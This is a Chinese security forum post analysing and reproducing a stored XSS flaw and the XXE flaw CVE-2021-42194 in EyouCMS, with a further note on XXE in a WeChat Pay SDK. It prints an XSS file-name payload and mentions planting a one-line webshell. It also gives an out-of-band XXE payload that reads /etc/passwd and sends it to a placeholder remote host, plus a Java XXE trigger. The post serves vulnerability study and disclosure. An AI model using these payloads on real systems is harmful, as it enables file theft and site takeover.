问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
eyoucmsCVE-2021-42194与存储型xss分析
渗透测试
EyouCms是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统,本次漏洞包括:存储型xss漏洞、xxe漏洞(cve-2021-42194 )
0x01 存储型xss漏洞 ============= 漏洞分析 ---- 1、定位到漏洞点,/application/function.php 我们可以发现对于上传的图片进行了后缀的检验,以及对于名称中的.\\/进行了过滤,但并没有对图片进行重命名 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-f8812661efbde461b993f651489b78ad4e7eb3b3.png) 漏洞利用 ---- 1、所以我们可以上传名称为 `<img src=1 onerror=alert(1)>.jpg`的图片 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-1a6adeef5b1bea27e3cda859dfe4a03bb598ee10.png) 2、点击头像->个人信息->更换头像->上传图片,我们发现xss代码成功执行 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3a5e3cf5d909a3417da95713aec6e2319466a753.png) 拓展 -- 1、我们还可以上传名为一句话木马的图片 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-611fbfd24e7f40b8bc681df463cd7d630a6c0e4f.png) 如果目标网站是使用的phpstudy进行的建站,那么在mysql文件下的upload.MYD文件中会将一句话木马保存下来,如果目标站点存在文件包含漏洞,那么将直接getshell ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-fcdf92d7cafd2aca6134eb594dd766f4cc396af3.png) 0x02 xxe漏洞(cve-2021-42194 ) =========================== 漏洞分析 ---- 1、我们定位到漏洞地址application/home/controller/Index.php的wechat\_return()方法中,我们可以看到第137行直接将传入的xml代码给到了simplexml\_load\_String函数进行了解析,并且没有禁用外部实体,最终导致了xxe漏洞。 而进入到simplexml\_load\_String函数的前提条件是,先从数据库中查询pay\_info字段,然后获取其中的appid,如果appid不为空或者传入的xml代码中存在appid,那么就会造成xxe漏洞。 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-b1f3c317f87a04bf75ae5d2664ab2d22d2bdd9d2.png) 2、这个appid可以定位到application/admin/controller/PayApi.php的WeChatPayConfig方法中 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-b43e3b0ee614aef8d90885fef1e96a88be3d927a.png) ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-d31685409ba0e71578696a45b97f2dae13f83b7b.png) 定位到网站中就是基本信息->接口配置->微信支付 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-44d52f1550975d4fd67db10fa367a4c03b510fe3.png) 定位到数据库中就是pay\_api\_config->pay\_mark=wechat->payinfo ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6c882d362179d1f8087d4352426612b374f6d358.png) ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-e013d9aa20d79a4ab7136335f93ce556625fe7ed.png) 漏洞利用 ---- 1、dnslog测试,发现是无回显的xxe ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9991b2ad158997c6898b84adaa9d55d3cd35d49b.png) ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-0ca7f5dcc1ddc35f49171fc0a31745355797847a.png) 2、我们可以使用参数实体,引用外部DTD。 ```php Payload %remote;%int;%send; \]> test.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip?p=%file;'>"> ``` ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-b9dcfac79d1698d702f7a4dd77803a12afde8671.png) 3、可以看到在服务器日志上面出现了我们想要的内容。 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-64f12e88fa588fad403486a43c643654f3a8f8fe.png) **整个调用过程:** 我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;,这就是我们的利用顺序,%remote 先调用,调用后请求远程服务器上的 test.dtd ,有点类似于将 test.dtd 包含进来,然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件,然后将 %file 的结果填入到 %send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %),我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。 拓展 -- 1、这个漏洞让我想到了微信支付的xxe漏洞,WXPayUtil下的xmlToMap方法存在XXE漏洞,使用了DocumentBuilder危险函数,直接将传入的字符串转换为了map集合,并且未对字符串进行过滤,导致攻击者可以传入任意的攻击代码。 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6f2a8b8b347d9be5ef14214d18549f555e327db2.png) 我们写一个测试方法,调用xmlToMap方法,发现成功读取文件内容。 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-701c52680bf7b2214b3b318ff0e98102135f1cc3.png) ```php package com.github.wxpay.sdk; import java.util.Map; public class test { public static void main(String\[\] args) { String str = "<?xml version='1.0' encoding='utf-8'?>\\r\\n"+ "\\r\\n"+ " \]>\\r\\n"+ "<creds><goodies>&goodies;</goodies><pa>susu</pa></creds>"; Map<String, String> map; try { map = new WXPayUtil().xmlToMap(str); System.out.println(map); } catch (Exception e) { e.printStackTrace(); } } } ``` 可能有些同学会有疑惑,为什么要嵌套两个元素,如: "<creds><passwd>&goodies;</passwd></creds>"; 因为传入的xml语句的元素会被当作map的key,变量会被当成map的value,如果是只嵌套一个元素,如: "<creds>&goodies;</creds>";转换为map后就变成了{ },因为是获取子节点传入nodeList中,上面的写法没有子节点,所以输出null。 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3fc535d86b263544b8a82cc6786c33735386450a.png) 可以看到子节点都被转换为map输出出来。 ![](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-36112055edeaca437bf24754e22f933bbe8f40b4.png) 0x03 参考链接 ========= <https://github.com/eyoucms/eyoucms/issues/19> <https://github.com/eyoucms/eyoucms/issues/23>
发表于 2022-04-11 09:40:41
阅读 ( 15196 )
分类:
漏洞分析
3 推荐
收藏
0 条评论
请先
登录
后评论
苏苏的五彩棒
25 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!